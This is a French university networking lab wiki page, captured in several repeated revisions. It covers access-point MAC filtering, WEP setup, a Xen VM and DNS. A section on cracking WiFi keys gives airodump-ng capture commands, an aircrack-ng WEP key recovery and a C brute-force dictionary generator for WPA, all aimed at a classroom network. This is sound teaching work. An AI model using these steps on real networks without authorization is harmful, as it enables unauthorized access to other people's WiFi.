# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
<br />
</pre><br />
<br />
<br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23093
TP sysres IMA2a5 2015/2016 G3
2015-11-20T09:53:21Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre><br />
<br />
Serveur DNS<br />
modification du fichier /var/cache/bind option<br />
<pre><br />
nano /etc/bind/named.conf.options <br />
<br />
<br />
<br />
59 apt-get install vim strace tcpdump <br />
60 apt-get install host<br />
61 host -t ni love-in-the-world.space<br />
62 host -t any love-in-the-world.space<br />
68 vim named.conf.options <br />
69 cp db.local db.love-in-the-world<br />
70 cat named.conf.default-zones <br />
71 vim named.conf.local <br />
73 vim db.love-in-the-world <br />
service bind9 stop<br />
76 service bind9 start<br />
77 cat /var/log/daemon.log<br />
78 vim db.love-in-the-world <br />
service bind9 stop<br />
vim db.love-in-the-world <br />
service bind9 start<br />
cat /var/log/daemon.log<br />
cat /var/log/daemon.log<br />
</pre><br />
<br />
<h2>Partie III - Installation de Debian sur les nouvelles machines </h2><br />
<br />
<br />
<h2>Partie IV - Cassage d'une cles Wifi </h2><br />
<h4>a) Préparation </h4><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h4>b) Cassage d'une cles WEP </h4><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w fcracotte06<br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ]<br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h4>c) Cassage d'une cles WPA</h4><br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23092
TP sysres IMA2a5 2015/2016 G3
2015-11-20T09:52:19Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre><br />
<br />
Serveur DNS<br />
modification du fichier /var/cache/bind option<br />
<pre><br />
nano /etc/bind/named.conf.options <br />
<br />
<br />
<br />
59 apt-get install vim strace tcpdump <br />
60 apt-get install host<br />
61 host -t ni love-in-the-world.space<br />
62 host -t any love-in-the-world.space<br />
68 vim named.conf.options <br />
69 cp db.local db.love-in-the-world<br />
70 cat named.conf.default-zones <br />
71 vim named.conf.local <br />
73 vim db.love-in-the-world <br />
service bind9 stop<br />
76 service bind9 start<br />
77 cat /var/log/daemon.log<br />
78 vim db.love-in-the-world <br />
service bind9 stop<br />
vim db.love-in-the-world <br />
service bind9 start<br />
cat /var/log/daemon.log<br />
cat /var/log/daemon.log<br />
</pre><br />
<br />
<h2>Partie III - Installation de Debian sur les nouvelles machines </h2><br />
<br />
<br />
<h2>Partie IV - Cassage d'une cles Wifi </h2><br />
<h4>a) Préparation </h4><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h4>b) Cassage d'une cles WEP </h4><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w fcracotte06<br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ]<br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h4>c) Cassage d'une cles WPA</h4><br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
</pre><br />
<br />
- creation d'un dictionaire :<br />
code C:<br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
</pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23082
TP sysres IMA2a5 2015/2016 G3
2015-11-20T08:25:31Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h5> 1) Configuration du point d’accès Cisco </h5><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h5> 1) Configuration du Wifi sur l'eeePC </h5><br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h2>Partie II - Installation de ma machine virtuel </h2><br />
<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
</pre><br />
<br />
Serveur DNS<br />
modification du fichier /var/cache/bind option<br />
<pre><br />
nano /etc/bind/named.conf.options <br />
<br />
<br />
<br />
59 apt-get install vim strace tcpdump <br />
60 apt-get install host<br />
61 host -t ni love-in-the-world.space<br />
62 host -t any love-in-the-world.space<br />
68 vim named.conf.options <br />
69 cp db.local db.love-in-the-world<br />
70 cat named.conf.default-zones <br />
71 vim named.conf.local <br />
73 vim db.love-in-the-world <br />
service bind9 stop<br />
76 service bind9 start<br />
77 cat /var/log/daemon.log<br />
78 vim db.love-in-the-world <br />
service bind9 stop<br />
vim db.love-in-the-world <br />
service bind9 start<br />
cat /var/log/daemon.log<br />
cat /var/log/daemon.log<br />
</pre><br />
<br />
<h2>Partie III - Installation de Debian sur les nouvelles machines </h2><br />
<br />
<br />
<h2>Partie IV - Cassage d'une cles Wifi </h2><br />
<h4>a) Préparation </h4><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<br />
<h4>b) Cassage d'une cles WEP </h4><br />
<br />
Je scan le reseax Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J'identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w fcracotte06<br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
</pre><br />
<br />
<br />
<h4>c) Cassage d'une cles WPA</h4><br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23079
TP sysres IMA2a5 2015/2016 G3
2015-11-20T07:34:52Z
<p>Mstrunc : </p>
<hr />
<div><h1>Projet Système & Réseaux IMA2A S9 </h1><br />
<br /><br />
<h2>Partie I - Configuration du point d’accès</h2><br />
<br />
<h4>a) Restriction par adresse MAC </h4><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
